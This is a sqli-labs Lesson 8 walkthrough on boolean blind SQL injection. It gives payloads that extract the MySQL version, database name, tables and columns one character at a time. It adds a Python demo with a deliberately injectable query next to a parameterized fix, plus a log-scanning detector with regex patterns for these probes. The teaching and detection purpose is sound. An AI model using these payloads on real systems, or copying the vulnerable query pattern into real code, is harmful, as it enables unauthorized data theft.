SQLi-labs: Lesson-8

Blind SQLi

  1. Get the database version

    • Get the first character.

      ?id=1' and (select substr(version(),1,1))<6--+

      Result: You are in...........

      ?id=1' and (select substr(version(),1,1))<5--+

      No result.

      ?id=1' and (select substr(version(),1,1))=5--+

      Result: You are in...........

      So the first character of the database version is 5.

    • Get the second character.

      Since the version string has the form x.x.x, the second character should be '.', whose ASCII code is 46.

      ?id=1' and ascii(substr(version(),2,1))<ascii(1)--+ returns true.

      ?id=1' AND (ascii(substr(version(),2,1))=46)--+ or ?id=1' AND (ascii(substr(version(),2,1))=ascii('.'))--+ returns true.

      So the second character is '.'.

    Similarly, we can get the other characters of the database version:

    5.6.30-1
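Every request above is a yes/no question: the page either shows "You are in..........." or nothing, and the only thing that decides which is whether the spliced condition is true. The following added example (my own code, not part of sqli-labs) reproduces that oracle in Python with an in-memory SQLite database standing in for MySQL, then shows that the same input against a parameterized query returns the same answer for every condition, because the string is compared to the `id` column as one value and never parsed as SQL. The sample rows and the use of `sqlite_version()` in place of MySQL's `version()` are assumptions for this demo.

```python
import sqlite3

BANNER = "You are in..........."

# Constructed sample rows; the lab's real table contents are not reproduced here.
SAMPLE_USERS = [("1", "alice", "pw-one"), ("2", "bob", "pw-two")]


def make_db():
    """In-memory SQLite stand-in for the lab's MySQL 'security' database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id TEXT, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def vulnerable_lookup(conn, raw_id):
    """Mirrors the lab pattern: the request parameter is spliced into the SQL text,
    so an `and <condition>` appended by the client becomes part of the WHERE clause."""
    sql = f"SELECT username FROM users WHERE id='{raw_id}' LIMIT 0,1"
    return BANNER if conn.execute(sql).fetchone() else ""


def safe_lookup(conn, raw_id):
    """Parameterized form: the whole parameter is one value compared to `id`.
    The SQL text never changes, so no client-supplied condition is evaluated."""
    sql = "SELECT username FROM users WHERE id=? LIMIT 0,1"
    return BANNER if conn.execute(sql, (raw_id,)).fetchone() else ""


def oracle(lookup, conn, condition):
    """Ask the page a yes/no question the way the walkthrough does: 1' and (cond)--
    The trailing '-- ' is what '--+' becomes after URL decoding; in the vulnerable
    query it comments out the rest of the statement (here the LIMIT clause)."""
    return lookup(conn, f"1' and ({condition})-- ") == BANNER


# Two conditions whose truth is known in advance: SQLite's version string is 3.x,
# so its second character is '.' (the lesson's second-character check, transposed).
TRUE_COND = "substr(sqlite_version(),2,1)='.'"
FALSE_COND = "substr(sqlite_version(),2,1)='x'"


def compare():
    """Returns (answer for TRUE_COND, answer for FALSE_COND) per lookup style."""
    conn = make_db()
    return {
        "vulnerable": (oracle(vulnerable_lookup, conn, TRUE_COND),
                       oracle(vulnerable_lookup, conn, FALSE_COND)),
        "safe": (oracle(safe_lookup, conn, TRUE_COND),
                 oracle(safe_lookup, conn, FALSE_COND)),
        # The fixed version still works for an honest id.
        "safe_plain_id": safe_lookup(conn, "1") == BANNER,
    }


if __name__ == "__main__":
    print(compare())
```

The vulnerable lookup answers (True, False): the response tracks the condition, which is all an attacker needs to read data one character at a time. The parameterized lookup answers (False, False) for both probes and True only for a genuine id, so there is nothing to read.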

  2. Get the database name

    • ?id=1' AND (ascii(substr(database(),1,1))>ascii('a'))--+ returns true.
    • ?id=1' AND (ascii(substr(database(),1,1))>ascii('x'))--+ returns false.
    • ?id=1' AND (ascii(substr(database(),1,1))<ascii('m'))--+ returns false.
    • ?id=1' AND (ascii(substr(database(),1,1))=ascii('s'))--+ returns true. So the first character is 's'.
    • Similarly, we can determine that the database name is 'security'.

  3. Get the table name

    • ?id=1' AND (ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='security'),1,1))=ascii('e'))--+
    • or, ?id=1' AND (ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))=ascii('e'))--+
    • or, ?id=1' AND (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=ascii('e'))--+

      Comment:

      Result of group_concat(table_name): emails,referers,uagents,users

      Result of select table_name....limit 0,1: emails

  4. Get columns

    • ?id=1' AND (ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),1,1))=ascii('i'))--+ returns true.
    • or, ?id=1' AND (ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 0,1),1,1))=ascii('i'))--+ returns true.

      Comment:

      Result of group_concat(column_name): id,username,password

      Result of select column_name....limit 0,1: id
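From the server side, the steps above have a recognisable footprint: every probe breaks out of the quoted `id` value with `' and`/`' AND`, calls `substr()` and `ascii()`, later reaches into `information_schema`, and ends with a comment tail; both the "true" and "false" probes return HTTP 200 and differ only in body size, so status-code alerting never sees them. The example below (added here, not from sqli-labs) scans constructed access-log lines for those building blocks after URL-decoding the query string, and then counts flagged requests per source, since boolean-based extraction needs many near-identical requests per character. The log format, IPs and threshold are assumptions for this demo.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus, urlsplit

# Constructed access-log lines (not from any real server). The 10.0.0.9 requests
# reuse the probe shapes from this lesson, URL-encoded as a browser would send them.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /Less-8/?id=1 HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /Less-8/?id=1%27+and+%28select+substr%28version%28%29%2C1%2C1%29%29%3C6--+ HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /Less-8/?id=1%27+and+%28select+substr%28version%28%29%2C1%2C1%29%29%3C5--+ HTTP/1.1" 200 498
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /Less-8/?id=1%27+AND+%28ascii%28substr%28database%28%29%2C1%2C1%29%29%3Eascii%28%27a%27%29%29--+ HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /Less-8/?id=1%27+AND+%28ascii%28substr%28%28select+group_concat%28table_name%29+from+information_schema.tables+where+table_schema%3Ddatabase%28%29%29%2C1%2C1%29%29%3Dascii%28%27e%27%29%29--+ HTTP/1.1" 200 512
10.0.0.7 - - [01/Jan/2024:10:00:06 +0000] "GET /Less-8/?id=2 HTTP/1.1" 200 512
"""

# Combined log format: ip ident user [time] "method target protocol" status bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d+) (?P<bytes>\d+)'
)

# Each indicator is one building block of the lesson's probes, matched on the
# decoded query string so percent-encoding and '+' do not hide it.
INDICATORS = {
    "quote_boolean": re.compile(r"'\s*(and|or)\b", re.I),      # 1' and ...
    "substr": re.compile(r"\bsubstr(ing)?\s*\(", re.I),        # substr(version(),1,1)
    "ascii": re.compile(r"\bascii\s*\(", re.I),                # ascii(...)
    "information_schema": re.compile(r"\binformation_schema\b", re.I),
    "comment_tail": re.compile(r"--\s*$|#\s*$"),               # --+ after decoding
}


def decode_query(target):
    """Query string of the request target, fully URL-decoded ('+' becomes space)."""
    return unquote_plus(urlsplit(target).query)


def indicators_for(target):
    q = decode_query(target)
    return [name for name, rx in INDICATORS.items() if rx.search(q)]


def scan(log_text):
    """One record per request that triggers at least one indicator."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        found = indicators_for(m["target"])
        if found:
            hits.append({
                "ip": m["ip"],
                "status": int(m["status"]),
                "bytes": int(m["bytes"]),
                "indicators": found,
                "query": decode_query(m["target"]),
            })
    return hits


def suspicious_sources(hits, threshold=3):
    """Sources with `threshold` or more flagged requests. A single probe can be noise;
    a run of them from one address is the shape of character-by-character extraction."""
    counts = Counter(h["ip"] for h in hits)
    return {ip: n for ip, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for h in found:
        print(h["ip"], h["status"], h["bytes"], h["indicators"])
    print(suspicious_sources(found))
```

On the sample, the two legitimate requests (`id=1`, `id=2`) trigger nothing, the four probes from 10.0.0.9 are flagged, and that address crosses the per-source threshold. The `bytes` field is kept deliberately: the 512 vs 498 difference between the true and false probes is the only response-side signal, so a rule that groups flagged requests by source and watches the body-size distribution catches this even when the indicators are obfuscated.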

Enjoy : )
